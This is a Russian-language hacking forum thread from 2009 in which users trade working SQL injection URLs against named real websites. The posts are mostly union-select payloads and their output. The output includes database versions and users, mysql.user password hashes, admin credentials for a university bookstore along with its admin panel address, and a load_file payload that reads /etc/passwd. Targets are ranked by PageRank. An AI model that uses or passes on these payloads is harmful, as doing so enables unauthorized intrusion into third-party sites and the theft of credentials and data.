ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7351  
Старый 06.01.2009, 01:07
Аватар для Gemini12
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

Код:
http://www.ajour-travel.ru/tab.php?strana='
Элементарно не смог посчитать количество столбцов. Нервы сдали после такого..................
 
Ответить с цитированием

  #7352  
Старый 06.01.2009, 02:33
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

http://info.twtelecom.net/info.php?id=-2+union+select+1,concat_ws(0x3a3a,version(),user() ,database()),3--

5.0.22
info@localhost
info

http://www.allyth.com/page.php?lnkid=601111+union+select+1,2,3,4,5,conca t_ws(0x3a3a,version(),user(),database())--

5.0.67-community
almoonn_rfaah@localhost
almoonn_rfaah

http://www.sabeel.org/etemplate.php?id=-2+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database()),6,7,8,9,10,11,12,13--

5.0.45-community-nt
web@localhost
502401045_sabeel

http://www.ieeta.pt/sias/high_details.php?id=-98+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6--

PageRank = 7

4.0.26
licinio@srv1-ieeta.ieeta.pt
sias_extended
 
Ответить с цитированием

  #7353  
Старый 06.01.2009, 05:28
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от Gemini12  
это пхп
Это не пхп, sql но в Limit - ничего не зделаешь.


Эдушный шоп ( пр 6 )

http://bookstore.juilliard.edu/pages/music_books.php?id=-823+union+select+1,concat_ws(0x2d2d2d,user,host,pa ssword,file_priv),333333+from+mysql.user--

есть пользователи с host % и file_priv Y ( tim:abs123), но открытых портов которые смахивали бы на Mysql не нашел.
Вот админы

http://bookstore.juilliard.edu/pages/music_books.php?id=-823+union+select+1,concat_ws(0x2f,username,passwor d,priv,email),3+from+users+where+priv=0x61646d696e--

chungresto
jonsoons:54645464

Админка:
https://bookstore.juilliard.edu/admin/

Последний раз редактировалось AkyHa_MaTaTa; 06.01.2009 в 05:40..
 
Ответить с цитированием

  #7354  
Старый 06.01.2009, 05:52
Аватар для -=Razor=-
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799

Репутация: 62
По умолчанию

Цитата:
http://www.vfs.com/curriculum.php?id=3+union+select+1,2,3,unhex(hex(g roup_concat(table_name))),5+from+information_schem a.tables/*
5.0.22-standard-logvfscom_dbwebmaster@localhost
ТИЦ:160
PR:6


Цитата:
http://www.thisspartanlife.com/index.php?id=-999+union+select+1,concat_ws(char(32,45,32),%20ver sion(),user(),database()),3,4--
5.0.67-community - tsl_admin@localhost - tsl_admin

ТИЦ:30
PR:5

======

Цитата:
http://www.mmdb.ru/index.php?action=perf_by_genre&id_genre=-1033+union+select+1,version()/*
Version: 4.1.22-log
database: wwwmmdbusersru
user: mmdb@localhost

ТИЦ:40
PR: 5
 
Ответить с цитированием

  #7355  
Старый 06.01.2009, 07:29
Аватар для vakula
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию

Держите может у кого получится....сам не смог ничё сделать
http://www.fcmetalurg.com/news/index.php?id=1350
 
Ответить с цитированием

  #7356  
Старый 06.01.2009, 07:43
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
Сообщение от vakula  
Держите может у кого получится....сам не смог ничё сделать
http://www.fcmetalurg.com/news/index.php?id=1350
Там не нашел но тут да

http://www.fcmetalurg.com/club/about_team.php?tid=-5+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versio n(),user(),database()),8,9,10,11,12,13,14,15,16,17 ,18,19--

Version:4.0.27-standard-log
User:fcmetalu_club@localhost
Database:fcme
 
Ответить с цитированием

  #7357  
Старый 06.01.2009, 07:46
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Onestops.info - PR6 ~1.5к
Цитата:
http://www.onestops.info/category.php?cat_id=-10'+union+select+1,concat_ws(0x3a,table_name,table _schema),3+from+information_schema.columns+where+c olumn_name+like+'name'%23
5 ветка..

Metalstorm.ee - PR5 ~1к
Цитата:
http://www.metalstorm.ee/awards/categories.php?cat_id=-7+union+select+1,concat_ws(0x3a,table_name,table_s chema),3,4,5+from+information_schema.columns+where +column_name+like+0x70617373776f7264+limit+0,1/*
5 ветка..

Apricorn.com - PR5 ~1к
Цитата:
http://www.apricorn.com/products.php?cat_id=-52+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16/*
4 ветка..

Последний раз редактировалось sabe; 06.01.2009 в 07:51..
 
Ответить с цитированием

  #7358  
Старый 06.01.2009, 09:46
Аватар для zenon2
zenon2
Новичок
Регистрация: 25.10.2006
Сообщений: 10
Провел на форуме:
120981

Репутация: 1
По умолчанию

Народ если можно выложите пример где разрешено LOAD_FILE() в скуле. А то чтото перерыл кучу всего а так и ниразу не видел как это работает. Такой впечатление что чтото неправильно делаю потому как всегда резултат null.

Извините если offtop.
 
Ответить с цитированием

  #7359  
Старый 06.01.2009, 10:32
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

2 zenon2
понимаю тебя чел... у самого раньше такой же вопрос был...
Код:
http://www.abbotsfordinmotion.ca/news/general.php?id=-5307'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20'1
 
Ответить с цитированием

  #7360  
Старый 06.01.2009, 11:29
Аватар для zenon2
zenon2
Новичок
Регистрация: 25.10.2006
Сообщений: 10
Провел на форуме:
120981

Репутация: 1
По умолчанию

Цитата:
Сообщение от Iceangel_  
2 zenon2
понимаю тебя чел... у самого раньше такой же вопрос был...
Код:
http://www.abbotsfordinmotion.ca/news/general.php?id=-5307'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20'1
спасибо Хоть раз посмотрел
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ